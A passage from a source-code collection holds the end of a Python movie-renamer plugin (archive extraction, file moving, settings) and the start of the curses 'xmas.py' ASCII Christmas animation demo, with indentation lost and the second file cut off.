release_download.update({'pause': False, 'scan': True, 'process_complete': True})
scan_releases.append(release_download)
else:
scan_required = True
except:
log.error('Failed checking for release in downloader: %s', traceback.format_exc())
# The following can either be done here, or inside the scanner if we pass it scan_items in one go
for release_download in scan_releases:
# Ask the renamer to scan the item
if release_download['scan']:
if release_download['pause'] and self.conf('file_action') == 'link':
fireEvent('download.pause', release_download = release_download, pause = True, single = True)
self.scan(release_download = release_download)
if release_download['pause'] and self.conf('file_action') == 'link':
fireEvent('download.pause', release_download = release_download, pause = False, single = True)
if release_download['process_complete']:
# First make sure the files were successfully processed
if not self.hastagRelease(release_download = release_download, tag = 'failed_rename'):
# Remove the seeding tag if it exists
self.untagRelease(release_download = release_download, tag = 'renamed_already')
# Ask the downloader to process the item
fireEvent('download.process_complete', release_download = release_download, single = True)
if fire_scan and (scan_required or len(no_status_support) > 0):
self.scan()
self.checking_snatched = False
return True
except:
log.error('Failed checking snatched: %s', traceback.format_exc())
self.checking_snatched = False
return False
def extendReleaseDownload(self, release_download):
rls = None
db = get_db()
if release_download and release_download.get('id'):
try:
rls = db.get('release_download', '%s-%s' % (release_download.get('downloader'), release_download.get('id')), with_doc = True)['doc']
except:
log.error('Download ID %s from downloader %s not found in releases', (release_download.get('id'), release_download.get('downloader')))
if rls:
media = db.get('id', rls['media_id'])
release_download.update({
'imdb_id': getIdentifier(media),
'quality': rls['quality'],
'is_3d': rls['is_3d'],
'protocol': rls.get('info', {}).get('protocol') or rls.get('info', {}).get('type'),
'release_id': rls['_id'],
})
return release_download
def downloadIsTorrent(self, release_download):
return release_download and release_download.get('protocol') in ['torrent', 'torrent_magnet']
def fileIsAdded(self, src, group):
if not group or not group.get('before_rename'):
return False
return src in group['before_rename']
def moveTypeIsLinked(self):
return self.conf('default_file_action') in ['copy', 'link']
def statusInfoComplete(self, release_download):
return release_download.get('id') and release_download.get('downloader') and release_download.get('folder')
def movieInFromFolder(self, media_folder):
return media_folder and isSubFolder(media_folder, sp(self.conf('from'))) or not media_folder
def extractFiles(self, folder = None, media_folder = None, files = None, cleanup = False):
if not files: files = []
# RegEx for finding rar files
archive_regex = '(?P<file>^(?P<base>(?:(?!\.part\d+\.rar$).)*)\.(?:(?:part0*1\.)?rar)$)'
restfile_regex = '(^%s\.(?:part(?!0*1\.rar$)\d+\.rar$|[rstuvw]\d+$))'
extr_files = []
from_folder = sp(self.conf('from'))
# Check input variables
if not folder:
folder = from_folder
check_file_date = True
if media_folder:
check_file_date = False
if not files:
for root, folders, names in os.walk(folder):
files.extend([sp(os.path.join(root, name)) for name in names])
# Find all archive files
archives = [re.search(archive_regex, name).groupdict() for name in files if re.search(archive_regex, name)]
#Extract all found archives
for archive in archives:
# Check if it has already been processed by CPS
if self.hastagRelease(release_download = {'folder': os.path.dirname(archive['file']), 'files': archive['file']}):
continue
# Find all related archive files
archive['files'] = [name for name in files if re.search(restfile_regex % re.escape(archive['base']), name)]
archive['files'].append(archive['file'])
# Check if archive is fresh and maybe still copying/moving/downloading, ignore files newer than 1 minute
if check_file_date:
files_too_new, time_string = self.checkFilesChanged(archive['files'])
if files_too_new:
log.info('Archive seems to be still copying/moving/downloading or just copied/moved/downloaded (created on %s), ignoring for now: %s', (time_string, os.path.basename(archive['file'])))
continue
log.info('Archive %s found. Extracting...', os.path.basename(archive['file']))
try:
rar_handle = RarFile(archive['file'], custom_path = self.conf('unrar_path'))
extr_path = os.path.join(from_folder, os.path.relpath(os.path.dirname(archive['file']), folder))
self.makeDir(extr_path)
for packedinfo in rar_handle.infolist():
extr_file_path = sp(os.path.join(extr_path, os.path.basename(packedinfo.filename)))
if not packedinfo.isdir and not os.path.isfile(extr_file_path):
log.debug('Extracting %s...', packedinfo.filename)
rar_handle.extract(condition = [packedinfo.index], path = extr_path, withSubpath = False, overwrite = False)
if self.conf('unrar_modify_date'):
try:
os.utime(extr_file_path, (os.path.getatime(archive['file']), os.path.getmtime(archive['file'])))
except:
log.error('Rar modify date enabled, but failed: %s', traceback.format_exc())
extr_files.append(extr_file_path)
del rar_handle
except Exception as e:
log.error('Failed to extract %s: %s %s', (archive['file'], e, traceback.format_exc()))
continue
# Delete the archive files
for filename in archive['files']:
if cleanup:
try:
os.remove(filename)
except Exception as e:
log.error('Failed to remove %s: %s %s', (filename, e, traceback.format_exc()))
continue
files.remove(filename)
# Move the rest of the files and folders if any files are extracted to the from folder (only if folder was provided)
if extr_files and folder != from_folder:
for leftoverfile in list(files):
move_to = os.path.join(from_folder, os.path.relpath(leftoverfile, folder))
try:
self.makeDir(os.path.dirname(move_to))
self.moveFile(leftoverfile, move_to, cleanup)
except Exception as e:
log.error('Failed moving left over file %s to %s: %s %s', (leftoverfile, move_to, e, traceback.format_exc()))
# As we probably tried to overwrite the nfo file, check if it exists and then remove the original
if os.path.isfile(move_to):
if cleanup:
log.info('Deleting left over file %s instead...', leftoverfile)
os.unlink(leftoverfile)
else:
continue
files.remove(leftoverfile)
extr_files.append(move_to)
if cleanup:
# Remove all left over folders
log.debug('Removing old movie folder %s...', media_folder)
self.deleteEmptyFolder(media_folder)
media_folder = os.path.join(from_folder, os.path.relpath(media_folder, folder))
folder = from_folder
if extr_files:
files.extend(extr_files)
# Cleanup files and folder if media_folder was not provided
if not media_folder:
files = []
folder = None
return folder, media_folder, files, extr_files
rename_options = {
'pre': '<',
'post': '>',
'choices': {
'ext': 'Extention (mkv)',
'namethe': 'Moviename, The',
'thename': 'The Moviename',
'year': 'Year (2011)',
'first': 'First letter (M)',
'quality': 'Quality (720p)',
'quality_type': '(HD) or (SD)',
'3d': '3D',
'3d_type': '3D Type (Full SBS)',
'video': 'Video (x264)',
'audio': 'Audio (DTS)',
'group': 'Releasegroup name',
'source': 'Source media (Bluray)',
'resolution_width': 'resolution width (1280)',
'resolution_height': 'resolution height (720)',
'audio_channels': 'audio channels (7.1)',
'original': 'Original filename',
'original_folder': 'Original foldername',
'imdb_id': 'IMDB id (tt0123456)',
'cd': 'CD number (cd1)',
'cd_nr': 'Just the cd nr. (1)',
'mpaa': 'MPAA or other certification',
'mpaa_only': 'MPAA only certification (G|PG|PG-13|R|NC-17|Not Rated)',
'category': 'Category label',
},
}
config = [{
'name': 'renamer',
'order': 40,
'description': 'Move and rename your downloaded movies to your movie directory.',
'groups': [
{
'tab': 'renamer',
'name': 'renamer',
'label': 'Rename downloaded movies',
'wizard': True,
'options': [
{
'name': 'enabled',
'default': False,
'type': 'enabler',
},
{
'name': 'from',
'type': 'directory',
'description': 'Folder where CP searches for movies.',
},
{
'name': 'to',
'type': 'directory',
'description': 'Default folder where the movies are moved to.',
},
{
'name': 'to if 3d',
'type': 'directory',
'description': 'Default folder where the movies are moved to if 3D.',
},
{
'name': 'folder_name',
'label': 'Folder naming',
'description': 'Name of the folder. Keep empty for no folder.',
'default': '<namethe> (<year>)',
'type': 'choice',
'options': rename_options
},
{
'name': 'folder_name_3d',
'label': 'Folder naming if 3D',
'description': 'Name of the folder for 3D. Keep empty for no folder.',
'default': '<namethe> <3d> (<year>)',
'type': 'choice',
'options': rename_options
},
{
'name': 'file_name',
'label': 'File naming',
'description': 'Name of the file',
'default': '<thename><cd>.<ext>',
'type': 'choice',
'options': rename_options
},
{
'name': 'file_name_3d',
'label': 'File naming if 3D',
'description': 'Name of the file for 3D',
'default': '<thename><cd> <3d>.<ext>',
'type': 'choice',
'options': rename_options
},
{
'advanced': True,
'name': 'unrar_modify_date',
'type': 'bool',
'description': ('Set modify date of unrar-ed files to the rar-file\'s date.', 'This will allow XBMC to recognize extracted files as recently added even if the movie was released some time ago.'),
'default': False,
},
{
'name': 'cleanup',
'type': 'bool',
'description': 'Cleanup leftover files after successful rename.',
'default': False,
},
{
'advanced': True,
'name': 'run_every',
'label': 'Run every',
'default': 1,
'type': 'int',
'unit': 'min(s)',
'description': ('Detect movie status every X minutes.', 'Will start the renamer if movie is <strong>completed</strong> or handle <strong>failed</strong> download if these options are enabled'),
},
{
'advanced': True,
'name': 'force_every',
'label': 'Force every',
'default': 2,
'type': 'int',
'unit': 'hour(s)',
'description': 'Forces the renamer to scan every X hours',
},
{
'advanced': True,
'name': 'next_on_failed',
'default': True,
'type': 'bool',
'description': 'Try the next best release for a movie after a download failed.',
},
{
'name': 'move_leftover',
'type': 'bool',
'description': 'Move all leftover file after renaming, to the movie folder.',
'default': False,
'advanced': True,
},
{
'advanced': True,
'name': 'separator',
'label': 'File-Separator',
'description': ('Replace all the spaces with a character.', 'Example: ".", "-" (without quotes). Leave empty to use spaces.'),
},
{
'advanced': True,
'name': 'foldersep',
'label': 'Folder-Separator',
'description': ('Replace all the spaces with a character.', 'Example: ".", "-" (without quotes). Leave empty to use spaces.'),
},
{
'name': 'default_file_action',
'label': 'Default File Action',
'default': 'move',
'type': 'dropdown',
'values': [('Link', 'link'), ('Copy', 'copy'), ('Move', 'move')],
'description': ('<strong>Link</strong>, <strong>Copy</strong> or <strong>Move</strong> after download completed.',
'Link first tries <a href="http://en.wikipedia.org/wiki/Hard_link">hard link</a>, then <a href="http://en.wikipedia.org/wiki/Sym_link">sym link</a> and falls back to Copy.'),
'advanced': True,
},
{
'name': 'file_action',
'label': 'Torrent File Action',
'default': 'link',
'type': 'dropdown',
'values': [('Link', 'link'), ('Copy', 'copy'), ('Move', 'move')],
'description': 'See above. It is prefered to use link when downloading torrents as it will save you space, while still beeing able to seed.',
'advanced': True,
},
{
'advanced': True,
'name': 'ntfs_permission',
'label': 'NTFS Permission',
'type': 'bool',
'hidden': os.name != 'nt',
'description': 'Set permission of moved files to that of destination folder (Windows NTFS only).',
'default': False,
},
],
}, {
'tab': 'renamer',
'name': 'meta_renamer',
'label': 'Advanced renaming',
'description': 'Meta data file renaming. Use <filename> to use the above "File naming" settings, without the file extention.',
'advanced': True,
'options': [
{
'name': 'rename_nfo',
'label': 'Rename .NFO',
'description': 'Rename original .nfo file',
'type': 'bool',
'default': True,
},
{
'name': 'nfo_name',
'label': 'NFO naming',
'default': '<filename>.orig.<ext>',
'type': 'choice',
'options': rename_options
},
],
},
],
}]
| gpl-3.0 |
dennis-sheil/commandergenius | project/jni/python/src/Demo/curses/xmas.py | 34 | 25499 | # asciixmas
# December 1989 Larry Bartz Indianapolis, IN
#
# $Id: xmas.py 46623 2006-06-03 22:59:23Z andrew.kuchling $
#
# I'm dreaming of an ascii character-based monochrome Christmas,
# Just like the ones I used to know!
# Via a full duplex communications channel,
# At 9600 bits per second,
# Even though it's kinda slow.
#
# I'm dreaming of an ascii character-based monochrome Christmas,
# With ev'ry C program I write!
# May your screen be merry and bright!
# And may all your Christmases be amber or green,
# (for reduced eyestrain and improved visibility)!
#
#
# Notes on the Python version:
# I used a couple of `try...except curses.error' to get around some functions
# returning ERR. The errors come from using wrapping functions to fill
# windows to the last character cell. The C version doesn't have this problem,
# it simply ignores any return values.
#
import curses
import sys
FROMWHO = "Thomas Gellekum <tg@FreeBSD.org>"
def set_color(win, color):
if curses.has_colors():
n = color + 1
curses.init_pair(n, color, my_bg)
win.attroff(curses.A_COLOR)
win.attron(curses.color_pair(n))
def unset_color(win):
if curses.has_colors():
win.attrset(curses.color_pair(0))
def look_out(msecs):
curses.napms(msecs)
if stdscr.getch() != -1:
curses.beep()
sys.exit(0)
def boxit():
for y in range(0, 20):
stdscr.addch(y, 7, ord('|'))
for x in range(8, 80):
stdscr.addch(19, x, ord('_'))
for x in range(0, 80):
stdscr.addch(22, x, ord('_'))
return
def seas():
stdscr.addch(4, 1, ord('S'))
stdscr.addch(6, 1, ord('E'))
stdscr.addch(8, 1, ord('A'))
stdscr.addch(10, 1, ord('S'))
stdscr.addch(12, 1, ord('O'))
stdscr.addch(14, 1, ord('N'))
stdscr.addch(16, 1, ord("'"))
stdscr.addch(18, 1, ord('S'))
return
def greet():
stdscr.addch(3, 5, ord('G'))
stdscr.addch(5, 5, ord('R'))
stdscr.addch(7, 5, ord('E'))
stdscr.addch(9, 5, ord('E'))
stdscr.addch(11, 5, ord('T'))
stdscr.addch(13, 5, ord('I'))
stdscr.addch(15, 5, ord('N'))
stdscr.addch(17, 5, ord('G'))
stdscr.addch(19, 5, ord('S'))
return
def fromwho():
stdscr.addstr(21, 13, FROMWHO)
return
def tree():
set_color(treescrn, curses.COLOR_GREEN)
treescrn.addch(1, 11, ord('/'))
treescrn.addch(2, 11, ord('/'))
treescrn.addch(3, 10, ord('/'))
treescrn.addch(4, 9, ord('/'))
treescrn.addch(5, 9, ord('/'))
treescrn.addch(6, 8, ord('/'))
treescrn.addch(7, 7, ord('/'))
treescrn.addch(8, 6, ord('/'))
treescrn.addch(9, 6, ord('/'))
treescrn.addch(10, 5, ord('/'))
treescrn.addch(11, 3, ord('/'))
treescrn.addch(12, 2, ord('/'))
treescrn.addch(1, 13, ord('\\'))
treescrn.addch(2, 13, ord('\\'))
treescrn.addch(3, 14, ord('\\'))
treescrn.addch(4, 15, ord('\\'))
treescrn.addch(5, 15, ord('\\'))
treescrn.addch(6, 16, ord('\\'))
treescrn.addch(7, 17, ord('\\'))
treescrn.addch(8, 18, ord('\\'))
treescrn.addch(9, 18, ord('\\'))
treescrn.addch(10, 19, ord('\\'))
treescrn.addch(11, 21, ord('\\'))
treescrn.addch(12, 22, ord('\\'))
treescrn.addch(4, 10, ord('_'))
treescrn.addch(4, 14, ord('_'))
treescrn.addch(8, 7, ord('_'))
treescrn.addch(8, 17, ord('_'))
treescrn.addstr(13, 0, "//////////// \\\\\\\\\\\\\\\\\\\\\\\\")
treescrn.addstr(14, 11, "| |")
treescrn.addstr(15, 11, "|_|")
unset_color(treescrn)
treescrn.refresh()
w_del_msg.refresh()
return
def balls():
treescrn.overlay(treescrn2)
set_color(treescrn2, curses.COLOR_BLUE)
treescrn2.addch(3, 9, ord('@'))
treescrn2.addch(3, 15, ord('@'))
treescrn2.addch(4, 8, ord('@'))
treescrn2.addch(4, 16, ord('@'))
treescrn2.addch(5, 7, ord('@'))
treescrn2.addch(5, 17, ord('@'))
treescrn2.addch(7, 6, ord('@'))
treescrn2.addch(7, 18, ord('@'))
treescrn2.addch(8, 5, ord('@'))
treescrn2.addch(8, 19, ord('@'))
treescrn2.addch(10, 4, ord('@'))
treescrn2.addch(10, 20, ord('@'))
treescrn2.addch(11, 2, ord('@'))
treescrn2.addch(11, 22, ord('@'))
treescrn2.addch(12, 1, ord('@'))
treescrn2.addch(12, 23, ord('@'))
unset_color(treescrn2)
treescrn2.refresh()
w_del_msg.refresh()
return
def star():
treescrn2.attrset(curses.A_BOLD | curses.A_BLINK)
set_color(treescrn2, curses.COLOR_YELLOW)
treescrn2.addch(0, 12, ord('*'))
treescrn2.standend()
unset_color(treescrn2)
treescrn2.refresh()
w_del_msg.refresh()
return
def strng1():
treescrn2.attrset(curses.A_BOLD | curses.A_BLINK)
set_color(treescrn2, curses.COLOR_WHITE)
treescrn2.addch(3, 13, ord('\''))
treescrn2.addch(3, 12, ord(':'))
treescrn2.addch(3, 11, ord('.'))
treescrn2.attroff(curses.A_BOLD | curses.A_BLINK)
unset_color(treescrn2)
treescrn2.refresh()
w_del_msg.refresh()
return
def strng2():
treescrn2.attrset(curses.A_BOLD | curses.A_BLINK)
set_color(treescrn2, curses.COLOR_WHITE)
treescrn2.addch(5, 14, ord('\''))
treescrn2.addch(5, 13, ord(':'))
treescrn2.addch(5, 12, ord('.'))
treescrn2.addch(5, 11, ord(','))
treescrn2.addch(6, 10, ord('\''))
treescrn2.addch(6, 9, ord(':'))
treescrn2.attroff(curses.A_BOLD | curses.A_BLINK)
unset_color(treescrn2)
treescrn2.refresh()
w_del_msg.refresh()
return
def strng3():
treescrn2.attrset(curses.A_BOLD | curses.A_BLINK)
set_color(treescrn2, curses.COLOR_WHITE)
treescrn2.addch(7, 16, ord('\''))
treescrn2.addch(7, 15, ord(':'))
treescrn2.addch(7, 14, ord('.'))
treescrn2.addch(7, 13, ord(','))
treescrn2.addch(8, 12, ord('\''))
treescrn2.addch(8, 11, ord(':'))
treescrn2.addch(8, 10, ord('.'))
treescrn2.addch(8, 9, ord(','))
treescrn2.attroff(curses.A_BOLD | curses.A_BLINK)
unset_color(treescrn2)
treescrn2.refresh()
w_del_msg.refresh()
return
def strng4():
treescrn2.attrset(curses.A_BOLD | curses.A_BLINK)
set_color(treescrn2, curses.COLOR_WHITE)
treescrn2.addch(9, 17, ord('\''))
treescrn2.addch(9, 16, ord(':'))
treescrn2.addch(9, 15, ord('.'))
treescrn2.addch(9, 14, ord(','))
treescrn2.addch(10, 13, ord('\''))
treescrn2.addch(10, 12, ord(':'))
treescrn2.addch(10, 11, ord('.'))
treescrn2.addch(10, 10, ord(','))
treescrn2.addch(11, 9, ord('\''))
treescrn2.addch(11, 8, ord(':'))
treescrn2.addch(11, 7, ord('.'))
treescrn2.addch(11, 6, ord(','))
treescrn2.addch(12, 5, ord('\''))
treescrn2.attroff(curses.A_BOLD | curses.A_BLINK)
unset_color(treescrn2)
treescrn2.refresh()
w_del_msg.refresh()
return
def strng5():
treescrn2.attrset(curses.A_BOLD | curses.A_BLINK)
set_color(treescrn2, curses.COLOR_WHITE)
treescrn2.addch(11, 19, ord('\''))
treescrn2.addch(11, 18, ord(':'))
treescrn2.addch(11, 17, ord('.'))
treescrn2.addch(11, 16, ord(','))
treescrn2.addch(12, 15, ord('\''))
treescrn2.addch(12, 14, ord(':'))
treescrn2.addch(12, 13, ord('.'))
treescrn2.addch(12, 12, ord(','))
treescrn2.attroff(curses.A_BOLD | curses.A_BLINK)
unset_color(treescrn2)
# save a fully lit tree
treescrn2.overlay(treescrn)
treescrn2.refresh()
w_del_msg.refresh()
return
def blinkit():
treescrn8.touchwin()
for cycle in range(5):
if cycle == 0:
treescrn3.overlay(treescrn8)
treescrn8.refresh()
w_del_msg.refresh()
break
elif cycle == 1:
treescrn4.overlay(treescrn8)
treescrn8.refresh()
w_del_msg.refresh()
break
elif cycle == 2:
treescrn5.overlay(treescrn8)
treescrn8.refresh()
w_del_msg.refresh()
break
elif cycle == 3:
treescrn6.overlay(treescrn8)
treescrn8.refresh()
w_del_msg.refresh()
break
elif cycle == 4:
treescrn7.overlay(treescrn8)
treescrn8.refresh()
w_del_msg.refresh()
break
treescrn8.touchwin()
# ALL ON
treescrn.overlay(treescrn8)
treescrn8.refresh()
w_del_msg.refresh()
return
def deer_step(win, y, x):
win.mvwin(y, x)
win.refresh()
w_del_msg.refresh()
look_out(5)
def reindeer():
y_pos = 0
for x_pos in range(70, 62, -1):
if x_pos < 66: y_pos = 1
for looper in range(0, 4):
dotdeer0.addch(y_pos, x_pos, ord('.'))
dotdeer0.refresh()
w_del_msg.refresh()
dotdeer0.erase()
dotdeer0.refresh()
w_del_msg.refresh()
look_out(50)
y_pos = 2
for x_pos in range(x_pos - 1, 50, -1):
for looper in range(0, 4):
if x_pos < 56:
y_pos = 3
try:
stardeer0.addch(y_pos, x_pos, ord('*'))
except curses.error:
pass
stardeer0.refresh()
w_del_msg.refresh()
stardeer0.erase()
stardeer0.refresh()
w_del_msg.refresh()
else:
dotdeer0.addch(y_pos, x_pos, ord('*'))
dotdeer0.refresh()
w_del_msg.refresh()
dotdeer0.erase()
dotdeer0.refresh()
w_del_msg.refresh()
x_pos = 58
for y_pos in range(2, 5):
lildeer0.touchwin()
lildeer0.refresh()
w_del_msg.refresh()
for looper in range(0, 4):
deer_step(lildeer3, y_pos, x_pos)
deer_step(lildeer2, y_pos, x_pos)
deer_step(lildeer1, y_pos, x_pos)
deer_step(lildeer2, y_pos, x_pos)
deer_step(lildeer3, y_pos, x_pos)
lildeer0.touchwin()
lildeer0.refresh()
w_del_msg.refresh()
x_pos -= 2
x_pos = 35
for y_pos in range(5, 10):
middeer0.touchwin()
middeer0.refresh()
w_del_msg.refresh()
for looper in range(2):
deer_step(middeer3, y_pos, x_pos)
deer_step(middeer2, y_pos, x_pos)
deer_step(middeer1, y_pos, x_pos)
deer_step(middeer2, y_pos, x_pos)
deer_step(middeer3, y_pos, x_pos)
middeer0.touchwin()
middeer0.refresh()
w_del_msg.refresh()
x_pos -= 3
look_out(300)
y_pos = 1
for x_pos in range(8, 16):
deer_step(bigdeer4, y_pos, x_pos)
deer_step(bigdeer3, y_pos, x_pos)
deer_step(bigdeer2, y_pos, x_pos)
deer_step(bigdeer1, y_pos, x_pos)
deer_step(bigdeer2, y_pos, x_pos)
deer_step(bigdeer3, y_pos, x_pos)
deer_step(bigdeer4, y_pos, x_pos)
deer_step(bigdeer0, y_pos, x_pos)
x_pos -= 1
for looper in range(0, 6):
deer_step(lookdeer4, y_pos, x_pos)
deer_step(lookdeer3, y_pos, x_pos)
deer_step(lookdeer2, y_pos, x_pos)
deer_step(lookdeer1, y_pos, x_pos)
deer_step(lookdeer2, y_pos, x_pos)
deer_step(lookdeer3, y_pos, x_pos)
deer_step(lookdeer4, y_pos, x_pos)
deer_step(lookdeer0, y_pos, x_pos)
for y_pos in range(y_pos, 10):
for looper in range(0, 2):
deer_step(bigdeer4, y_pos, x_pos)
deer_step(bigdeer3, y_pos, x_pos)
deer_step(bigdeer2, y_pos, x_pos)
deer_step(bigdeer1, y_pos, x_pos)
deer_step(bigdeer2, y_pos, x_pos)
deer_step(bigdeer3, y_pos, x_pos)
deer_step(bigdeer4, y_pos, x_pos)
deer_step(bigdeer0, y_pos, x_pos)
y_pos -= 1
deer_step(lookdeer3, y_pos, x_pos)
return
def main(win):
global stdscr
stdscr = win
global my_bg, y_pos, x_pos
global treescrn, treescrn2, treescrn3, treescrn4
global treescrn5, treescrn6, treescrn7, treescrn8
global dotdeer0, stardeer0
global lildeer0, lildeer1, lildeer2, lildeer3
global middeer0, middeer1, middeer2, middeer3
global bigdeer0, bigdeer1, bigdeer2, bigdeer3, bigdeer4
global lookdeer0, lookdeer1, lookdeer2, lookdeer3, lookdeer4
global w_holiday, w_del_msg
my_bg = curses.COLOR_BLACK
# curses.curs_set(0)
treescrn = curses.newwin(16, 27, 3, 53)
treescrn2 = curses.newwin(16, 27, 3, 53)
treescrn3 = curses.newwin(16, 27, 3, 53)
treescrn4 = curses.newwin(16, 27, 3, 53)
treescrn5 = curses.newwin(16, 27, 3, 53)
treescrn6 = curses.newwin(16, 27, 3, 53)
treescrn7 = curses.newwin(16, 27, 3, 53)
treescrn8 = curses.newwin(16, 27, 3, 53)
dotdeer0 = curses.newwin(3, 71, 0, 8)
stardeer0 = curses.newwin(4, 56, 0, 8)
lildeer0 = curses.newwin(7, 53, 0, 8)
lildeer1 = curses.newwin(2, 4, 0, 0)
lildeer2 = curses.newwin(2, 4, 0, 0)
lildeer3 = curses.newwin(2, 4, 0, 0)
middeer0 = curses.newwin(15, 42, 0, 8)
middeer1 = curses.newwin(3, 7, 0, 0)
middeer2 = curses.newwin(3, 7, 0, 0)
middeer3 = curses.newwin(3, 7, 0, 0)
bigdeer0 = curses.newwin(10, 23, 0, 0)
bigdeer1 = curses.newwin(10, 23, 0, 0)
bigdeer2 = curses.newwin(10, 23, 0, 0)
bigdeer3 = curses.newwin(10, 23, 0, 0)
bigdeer4 = curses.newwin(10, 23, 0, 0)
lookdeer0 = curses.newwin(10, 25, 0, 0)
lookdeer1 = curses.newwin(10, 25, 0, 0)
lookdeer2 = curses.newwin(10, 25, 0, 0)
lookdeer3 = curses.newwin(10, 25, 0, 0)
lookdeer4 = curses.newwin(10, 25, 0, 0)
w_holiday = curses.newwin(1, 27, 3, 27)
w_del_msg = curses.newwin(1, 20, 23, 60)
try:
w_del_msg.addstr(0, 0, "Hit any key to quit")
except curses.error:
pass
try:
w_holiday.addstr(0, 0, "H A P P Y H O L I D A Y S")
except curses.error:
pass
# set up the windows for our various reindeer
lildeer1.addch(0, 0, ord('V'))
lildeer1.addch(1, 0, ord('@'))
lildeer1.addch(1, 1, ord('<'))
lildeer1.addch(1, 2, ord('>'))
try:
lildeer1.addch(1, 3, ord('~'))
except curses.error:
pass
lildeer2.addch(0, 0, ord('V'))
lildeer2.addch(1, 0, ord('@'))
lildeer2.addch(1, 1, ord('|'))
lildeer2.addch(1, 2, ord('|'))
try:
lildeer2.addch(1, 3, ord('~'))
except curses.error:
pass
lildeer3.addch(0, 0, ord('V'))
lildeer3.addch(1, 0, ord('@'))
lildeer3.addch(1, 1, ord('>'))
lildeer3.addch(1, 2, ord('<'))
try:
lildeer2.addch(1, 3, ord('~')) # XXX
except curses.error:
pass
middeer1.addch(0, 2, ord('y'))
middeer1.addch(0, 3, ord('y'))
middeer1.addch(1, 2, ord('0'))
middeer1.addch(1, 3, ord('('))
middeer1.addch(1, 4, ord('='))
middeer1.addch(1, 5, ord(')'))
middeer1.addch(1, 6, ord('~'))
middeer1.addch(2, 3, ord('\\'))
middeer1.addch(2, 5, ord('/'))
middeer2.addch(0, 2, ord('y'))
middeer2.addch(0, 3, ord('y'))
middeer2.addch(1, 2, ord('0'))
middeer2.addch(1, 3, ord('('))
middeer2.addch(1, 4, ord('='))
middeer2.addch(1, 5, ord(')'))
middeer2.addch(1, 6, ord('~'))
middeer2.addch(2, 3, ord('|'))
middeer2.addch(2, 5, ord('|'))
middeer3.addch(0, 2, ord('y'))
middeer3.addch(0, 3, ord('y'))
middeer3.addch(1, 2, ord('0'))
middeer3.addch(1, 3, ord('('))
middeer3.addch(1, 4, ord('='))
middeer3.addch(1, 5, ord(')'))
middeer3.addch(1, 6, ord('~'))
middeer3.addch(2, 3, ord('/'))
middeer3.addch(2, 5, ord('\\'))
bigdeer1.addch(0, 17, ord('\\'))
bigdeer1.addch(0, 18, ord('/'))
bigdeer1.addch(0, 19, ord('\\'))
bigdeer1.addch(0, 20, ord('/'))
bigdeer1.addch(1, 18, ord('\\'))
bigdeer1.addch(1, 20, ord('/'))
bigdeer1.addch(2, 19, ord('|'))
bigdeer1.addch(2, 20, ord('_'))
bigdeer1.addch(3, 18, ord('/'))
bigdeer1.addch(3, 19, ord('^'))
bigdeer1.addch(3, 20, ord('0'))
bigdeer1.addch(3, 21, ord('\\'))
bigdeer1.addch(4, 17, ord('/'))
bigdeer1.addch(4, 18, ord('/'))
bigdeer1.addch(4, 19, ord('\\'))
bigdeer1.addch(4, 22, ord('\\'))
bigdeer1.addstr(5, 7, "^~~~~~~~~// ~~U")
bigdeer1.addstr(6, 7, "( \\_____( /") # ))
bigdeer1.addstr(7, 8, "( ) /")
bigdeer1.addstr(8, 9, "\\\\ /")
bigdeer1.addstr(9, 11, "\\>/>")
bigdeer2.addch(0, 17, ord('\\'))
bigdeer2.addch(0, 18, ord('/'))
bigdeer2.addch(0, 19, ord('\\'))
bigdeer2.addch(0, 20, ord('/'))
bigdeer2.addch(1, 18, ord('\\'))
bigdeer2.addch(1, 20, ord('/'))
bigdeer2.addch(2, 19, ord('|'))
bigdeer2.addch(2, 20, ord('_'))
bigdeer2.addch(3, 18, ord('/'))
bigdeer2.addch(3, 19, ord('^'))
bigdeer2.addch(3, 20, ord('0'))
bigdeer2.addch(3, 21, ord('\\'))
bigdeer2.addch(4, 17, ord('/'))
bigdeer2.addch(4, 18, ord('/'))
bigdeer2.addch(4, 19, ord('\\'))
bigdeer2.addch(4, 22, ord('\\'))
bigdeer2.addstr(5, 7, "^~~~~~~~~// ~~U")
bigdeer2.addstr(6, 7, "(( )____( /") # ))
bigdeer2.addstr(7, 7, "( / |")
bigdeer2.addstr(8, 8, "\\/ |")
bigdeer2.addstr(9, 9, "|> |>")
bigdeer3.addch(0, 17, ord('\\'))
bigdeer3.addch(0, 18, ord('/'))
bigdeer3.addch(0, 19, ord('\\'))
bigdeer3.addch(0, 20, ord('/'))
bigdeer3.addch(1, 18, ord('\\'))
bigdeer3.addch(1, 20, ord('/'))
bigdeer3.addch(2, 19, ord('|'))
bigdeer3.addch(2, 20, ord('_'))
bigdeer3.addch(3, 18, ord('/'))
bigdeer3.addch(3, 19, ord('^'))
bigdeer3.addch(3, 20, ord('0'))
bigdeer3.addch(3, 21, ord('\\'))
bigdeer3.addch(4, 17, ord('/'))
bigdeer3.addch(4, 18, ord('/'))
bigdeer3.addch(4, 19, ord('\\'))
bigdeer3.addch(4, 22, ord('\\'))
bigdeer3.addstr(5, 7, "^~~~~~~~~// ~~U")
bigdeer3.addstr(6, 6, "( ()_____( /") # ))
bigdeer3.addstr(7, 6, "/ / /")
bigdeer3.addstr(8, 5, "|/ \\")
bigdeer3.addstr(9, 5, "/> \\>")
bigdeer4.addch(0, 17, ord('\\'))
bigdeer4.addch(0, 18, ord('/'))
bigdeer4.addch(0, 19, ord('\\'))
bigdeer4.addch(0, 20, ord('/'))
bigdeer4.addch(1, 18, ord('\\'))
bigdeer4.addch(1, 20, ord('/'))
bigdeer4.addch(2, 19, ord('|'))
bigdeer4.addch(2, 20, ord('_'))
bigdeer4.addch(3, 18, ord('/'))
bigdeer4.addch(3, 19, ord('^'))
bigdeer4.addch(3, 20, ord('0'))
bigdeer4.addch(3, 21, ord('\\'))
bigdeer4.addch(4, 17, ord('/'))
bigdeer4.addch(4, 18, ord('/'))
bigdeer4.addch(4, 19, ord('\\'))
bigdeer4.addch(4, 22, ord('\\'))
bigdeer4.addstr(5, 7, "^~~~~~~~~// ~~U")
bigdeer4.addstr(6, 6, "( )______( /") # )
bigdeer4.addstr(7, 5, "(/ \\") # )
bigdeer4.addstr(8, 0, "v___= ----^")
lookdeer1.addstr(0, 16, "\\/ \\/")
lookdeer1.addstr(1, 17, "\\Y/ \\Y/")
lookdeer1.addstr(2, 19, "\\=/")
lookdeer1.addstr(3, 17, "^\\o o/^")
lookdeer1.addstr(4, 17, "//( )")
lookdeer1.addstr(5, 7, "^~~~~~~~~// \\O/")
lookdeer1.addstr(6, 7, "( \\_____( /") # ))
lookdeer1.addstr(7, 8, "( ) /")
lookdeer1.addstr(8, 9, "\\\\ /")
